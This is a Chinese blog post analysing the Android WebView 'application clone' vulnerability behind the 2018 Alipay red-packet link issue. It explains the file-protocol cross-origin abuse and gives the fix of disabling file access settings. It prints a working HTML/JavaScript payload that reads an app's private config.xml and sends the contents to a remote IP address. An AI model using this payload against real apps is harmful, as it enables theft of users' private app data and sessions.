支付宝应用克隆2018/01/09

最新推荐文章于 2021-05-27 06:51:07 发布
最新推荐文章于 2021-05-27 06:51:07 发布
阅读量1.7k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 【移动端漏洞学习】 文章标签: Android 支付宝克隆 File 跨域 同源
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013107656/article/details/79136168
本文探讨了通过支付宝应用克隆自动领红包链接可能引发的安全问题,包括如何利用File协议跨域机制实施攻击,并提出了解决方案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

支付宝应用克隆

应用克隆,从支付宝自动领红包链接谈起

流程总结

自动抢红包的链接

通过接收外部传入的URL参数,在APP内进行加载 · URL Scheme协议 · link

跨域

浏览器同源策略 · 两个URL的协议、端口、域名相同,则为同源,互相访问资源不受限制

跨域请求 · 不同的源之间的请求,会被浏览器所禁止

File协议

主要用于访问本地文件 · html文件

WebView · setAllowUniversalAccessFromFileURLs · True

File协议的跨域机制 · File协议中的脚本可以跨域访问其他协议,比如HTTP

攻击思路

恶意html文件读取本地敏感文件内容,并通过HTTP请求发送至远程服务器

WebView加载本地恶意html文件

漏洞前提
  • 攻击者可以外部调用被攻击APP,指令其加载一个本地的html文件(比如抢红包链接)
  • 被攻击APP的setAllowUniversalAccessFromFileURLs值为true
  • 攻击者需要在被攻击的手机上下载一个html文件并保存在一个可被File协议访问到的位置(可以利用其他漏洞来实现)
payload
<html>
<script>

    var arm ="file:///data/data/com.example.q00412688.myapplication/shared_prefs/config.xml";
    var xmlhttp;

    if (window.XMLHttpRequest)
    {
        xmlhttp=new XMLHttpRequest();
    }

    xmlhttp.onreadystatechange=function()
    {
        //alert("statusis"+xmlhttp.status);
        if (xmlhttp.readyState==4)
        {
            window.data=xmlhttp.responseText;
            alert(window.data);
            var url ="http://114.115.139.176/getdata.jsp?data="+window.data;
            var xmlhttp2;

            if(window.XMLHttpRequest)
            {
                xmlhttp2=newXMLHttpRequest();
            }

            xmlhttp2.onreadystatechange=function()
            {
                //alert("statusis"+xmlhttp.status);
                if(xmlhttp2.readyState==4)
                {
                    alert(xmlhttp2.responseText);
                }
            }

            xmlhttp2.open("GET",url);
            xmlhttp2.send(null);
        }
    }

    xmlhttp.open("GET",arm);
    xmlhttp.send(null);

</script>
</html>
修复方案

将setAllowFileAccessFromFileURLs和setAllowUniversalAccessFromFileURLs这两个属性显示设置为False。

应用克隆漏洞原理分析
JiaoMaGe的博客
11-11 1334
应用克隆漏洞原理分析 0x01 前言 最近由于公司的需求,需要检测一下webview的漏洞,也就是前几个月很火的支付宝应用克隆事件的漏洞,所以需要了解并复现相关的漏洞, 该漏洞是由腾讯的玄武实验室发现的,支付宝克隆事件的具体发生场景如下: 用户在接收一条短信后,点开其中的链接,自动打开支付宝的webview组件,并加载相关的链接,之后跳到的界面是攻击者进行设置的抽奖界面,但是这个时候,对方的手...
Android中WebView漏洞分析和应用克隆问题情景还原(免Root获取应用沙盒数据)
编码美丽
04-02 900
一、前言去年年底支付宝的被克隆漏洞被爆出,无独有偶就是腾讯干的,其实真正了解这个事件之后会发现感觉是针对支付宝。因为这个漏洞找出肯定花费了很大劲,主要是因为支付宝的特殊业务需要开启了WebView的访问功能,导致了这个问题,其实Google官方的Android早期版本这个功能默认是开启的的确是个漏洞,但是最后的版本都默认关闭了,除非应用自己业务需要就开启。而支付宝的口令红包是利用了WebVie
支付宝源码demo
08-17
【旧版本】 下载之后解压有【MD5签名版本和RSA签名版本】文件 MD5签名版本 |————create_direct_pay_by_user-CSHARP-GBK |————create_direct_pay_by_user-CSHARP-UTF-8 |————create_direct_pay_by_user-JAVA-GBK |————create_direct_pay_by_user-JAVA-UTF-8 |————create_direct_pay_by_user-PHP-GBK |————create_direct_pay_by_user-PHP-UTF-8 |————alipay.acquire.customs-CSHARP-GBK |————alipay.acquire.customs-CSHARP-UTF-8 |————alipay.acquire.customs-JAVA-GBK |————alipay.acquire.customs-JAVA-UTF-8 |————alipay.acquire.customs-PHP-GBK |————alipay.acquire.customs-PHP-UTF-8 RSA签名版本 |————create_direct_pay_by_user-CSHARP-GBK |————create_direct_pay_by_user-CSHARP-UTF-8 |————create_direct_pay_by_user-JAVA-GBK |————create_direct_pay_by_user-JAVA-UTF-8 |————create_direct_pay_by_user-PHP-GBK |————create_direct_pay_by_user-PHP-UTF-8 |————alipay.acquire.customs-CSHARP-GBK |————alipay.acquire.customs-CSHARP-UTF-8 |————alipay.acquire.customs-JAVA-GBK |————alipay.acquire.customs-JAVA-UTF-8 |————alipay.acquire.customs-PHP-GBK |————alipay.acquire.customs-PHP-UTF-8 【新版本】 支付宝项目工程源码---Alipay-Source 支付宝官方例子工程源码---alipay.trade.page.pay-JAVA-UTF-8
支付宝克隆攻击原理分析
weixin_34272308的博客
04-08 708
在分析漏洞之前,我们先来了解两个相关知识点,和URL scheme。 一、URL Scheme URL Scheme是一种页面内跳转协议,就是通过定义自己的scheme协议,可以非常方便跳转app中的各个页面;通过scheme协议,服务器可以定制化告诉App跳转那个页面,可以通过通知栏消息定制化跳转页面,可以通过H5页面跳转页面等。1.URL Scheme应用场景 客户端应用可以向操...
支付宝原理
nculph的专栏
03-07 1642
2 功能演示 图2-1 移动快捷支付 SDK 业务流程图 流程说明(以 Android 平台为例):(1) 第 2 步 调用支付接口:此消息就是本接口所描述的SDK提供的支付对象 PayTask,将商户订单信息传进pay方法唤起支付宝收银台,订单格式具体参 见“5 请求参数说明”。 (2) 第 3 步:移动快捷 SDK 将会按照商户 App 提供的参数发送支付请求。 (3) 第 5 步 异步发
【原创】应用克隆,从支付宝自动领红包链接谈起
weixin_33860147的博客
03-19 2106
前言 2018年1月9号,腾讯玄武实验室召开了一个新闻发布会,向公众公布并演示了“应用克隆”漏洞,并称:利用该漏洞,用户只需要点击一个链接,用户的支付宝、携程等APP的登陆状态,就可以被克隆到其他用户的手机上,一时造成用户恐慌。恰好这段时间支付宝的“天天领红包”活动进行的如火如荼,出现了通过点击一个链接就自动抢红包的薅羊毛方式。下面结合支付宝的自动领红包链接,对“应用克隆”漏洞从技术原理上作一下...
支付宝(高仿)源码
07-10
等待完成界面: 1.手势解锁界面 2.其他详情页面 已经完成界面: 1.支付宝Home页(可自由对图标进行拖动排序和删除,尚未做持久化存储) 2.二维码、条形码扫描功能 3.服务界面 4.财富界面 5.余*额宝界面(收益数字动态表现) 测试环境:Xcode 6.2,iOS 6.0以上 欢迎有兴趣的同学和我一起努力完善此款APP
car2go:Car2Go 克隆应用程序
07-09
《构建Car2Go克隆应用:深度解析Java技术在移动出行领的应用》 Car2Go是一款全球知名的共享汽车服务,其便捷的用车体验受到了广大用户的欢迎。为了学习和理解其背后的技术实现,开发者们常常会尝试创建类似的应用...
支付宝红包助手源码 打造支付宝赏金套现系统
最新发布
09-16
修改appid为用于单笔转账至支付宝接口的支付宝APPID,alipayPublicKey为支付宝公钥,saPrivateKey为应用私钥。 c. 将payer_show_name修改为返款时显示的付款人名,remark修改为返款备注。根据需要修改announce字段...
Android中WebView漏洞分析和应用克隆问题情景还原(免Root获取应用沙盒数据)...
编码美丽
04-02 443
一、前言去年年底支付宝的被克隆漏洞被爆出,无独有偶就是腾讯干的,其实真正了解这个事件之后会发现感觉是针对支付宝。因为这个漏洞找出肯定花费了很大劲,主要是因为支付宝的特殊业...
android克隆漏洞分析,Android支付宝克隆漏洞
weixin_29985807的博客
05-27 272
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?上一篇文章介绍了Android Webview组件的安全问题,其中一个就是file访问限制不严格导致数据泄露,前段时间很火的支付宝克隆漏洞也是基于file协议的权限设置不当造成的,参考了很多文章总结一下攻击流程:Step 1 :通过 URL Scheme 的方式唤起打开 App 里暴露出去的(export=true)带...
腾讯发现“应用克隆”手机漏洞 特意点名支付宝、饿了么
中国财经
01-10 5108
资料图 中新经纬 黄昂瑾 摄   1月9日,腾讯微信公众号发布文章称,腾讯安全玄武实验室与知道创宇404实验室,在联合召开的技术研究成果发布会上,正式对外披露攻击威胁模型“应用克隆”。   腾讯称,在攻击模型的视角下,很多以前认为威胁不大、厂商不重视的安全问题,都可以轻松“克隆”用户账户,窃取隐私信息,盗取账号及资金等。 /*文章页正文*/ var cpro_id = "u271
主流安卓APP遭遇“应用克隆”危机,快速检测修复方案出炉
静静人生
01-10 1665
2018年1月9日, 国家信息安全漏洞共享平台(CNVD)发布关于Android WebView存在访问漏洞(CNVD-2017-36682)的公告。 漏洞描述 WebView是Android用于显示网页的控件,是一个基于Webkit引擎、展现Web页面、解析并执行Java代码的控件,Android应用可以使用WebView空间,灵活的扩展自身的业务功能。 市面上大多数使
支付宝工程师创造出了一个可以“拷贝”支付宝的神器
weixin_33755847的博客
01-08 186
mPaaS是源于支付宝的移动开发平台,从最初的金融级移动开发平台,逐渐演进成集开发、测试、发布、分析、运营于一体的 App 全生命周期管理平台,服务了广发银行、12306、上海地铁等标杆级客户,帮助客户完成技术升级与业务增长。 “拷贝”支付宝?呵,别逗了,这不可能。 但支付宝工程师们真的把这种“不可能”变成了可能。 1月4日,在上海举行...
关于腾讯玄武实验室公布的应用克隆漏洞的一些思考
niuzhucedenglu的博客
01-12 3112
2018-01-09 国家信息安全漏洞共享平台 公布了 《关于Android平台WebView控件存在访问高危漏洞的安全公告》 另外,关于该漏洞的原理 这里 有个补充说明: 从上文中我们可以看出是由于 WebView 的 file 问题,使应用加载的 JavaScript 可以获取应用的 私有数据 (即 /data/data/packageName/ 下的文件)导致的这个漏洞
支付宝等第三方支付原理与概述
热门推荐
HuiSirBlog
04-09 1万+
互联网第三方支付,基本由量大版块构成,第一类入在线转账,比如支付宝、微信支付这一类的,第二类如POS机这种的,如拉卡拉、块钱、汇付天下这种。 第三方支付出现,极大的冲击了商业银行的支付中介地位。举个例子:淘宝买家用建行的账户向卖家支付一万块钱,而卖家账户是在工商银行开设的,如果直接交易的话,就是买家从建行给卖家的工商银行的账户转账一万块钱,大家都知道行转账是要收取手续费的,一块钱是要收取很多的
90后小伙发现支付宝漏洞,自己编程两天“赚”百万!
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
04-15 1817
点击上方“程序员大咖”,选择“置顶公众号”关键时刻,第一时间送达!据央视网报道,但浙江余姚 90 后小伙陈某却在短短两天时间内,通过这个支付宝扫码领赏金的活动获得赏金 90 余万元。小伙利用漏洞 获得支付宝赏金 90 余万2017 年 12 月 8 日上午,待业在家的余姚 90 后小伙陈某参加了支付宝扫码领红包的活动,无意中发现了支付宝的一个漏洞:在某个支付宝页面中输入任意一个手机号码,支付宝后台
2023年大模型与AIGC技术交流峰会PPT精华汇总
AI销售助手中的声音克隆技术:讨论了如何在销售助手等应用场景中运用声音克隆技术,以提升用户体验和交互效率。 2. 基础模型与大语言模型论坛 大模型分布式训练的第四种境:研究了大模型在分布式训练环境下的新策略...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值